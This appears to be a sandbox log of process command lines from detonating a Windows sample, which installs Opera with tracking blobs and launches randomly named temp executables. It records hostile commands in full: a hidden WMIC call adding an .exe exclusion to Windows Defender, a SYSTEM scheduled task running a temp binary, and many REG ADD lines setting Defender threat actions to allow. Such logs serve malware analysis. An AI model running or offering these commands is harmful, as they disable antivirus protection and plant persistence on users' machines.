C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4396 -ip 4396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcebd73cb8,0x7ffcebd73cc8,0x7ffcebd73cd8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6436 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1700

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1820

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2096

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2100

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1112

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1652

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1924

C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe

C:\Users\Admin\AppData\Local\Temp\d3pdEIHF\nKCK4ZJZ894JRgKi.exe --silent --allusers=0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2140

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe --silent --allusers=0 --server-tracking-blob=YTZkZWRhZDNiNzMxNWZlYjNhNzA4ODE1NzgzOGY3Nzg4YjIyY2M3OTIxYmQyZjlhZmY4MzhmOThmZjRhZDYwOTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MjA5Nzk4OTYuMDQ5MCIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiODIxZGE0YjYtZDQzYy00ZDcwLTk5MzctNjk1ZjEyNjQzN2Y2In0=

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x33c,0x340,0x344,0x320,0x348,0x71fbb1f4,0x71fbb200,0x71fbb20c

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4396 -ip 4396

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1924

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2984 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240714175822" --session-guid=5224046d-bb2f-4f3d-8e31-ff9e513d16ac --server-tracking-blob=YTJjM2EyMWQyYzMzY2NlNTJlZDFjMTQyNzgwNzBlYzBkMWM0NWNiMjEyY2QyYTAzMjJmZGY0ZTUxMmE2NGMxZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk3OTg5Ni4wNDkwIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI4MjFkYTRiNi1kNDNjLTRkNzAtOTkzNy02OTVmMTI2NDM3ZjYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C06000000000000

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x7148b1f4,0x7148b200,0x7148b20c

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5364 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe"

C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe

C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe /did=757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1900

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xd59f88,0xd59f94,0xd59fa0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4396 -ip 4396

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1884

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 17:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe\" z0 /JydidW 757674 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe

C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe z0 /JydidW 757674 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

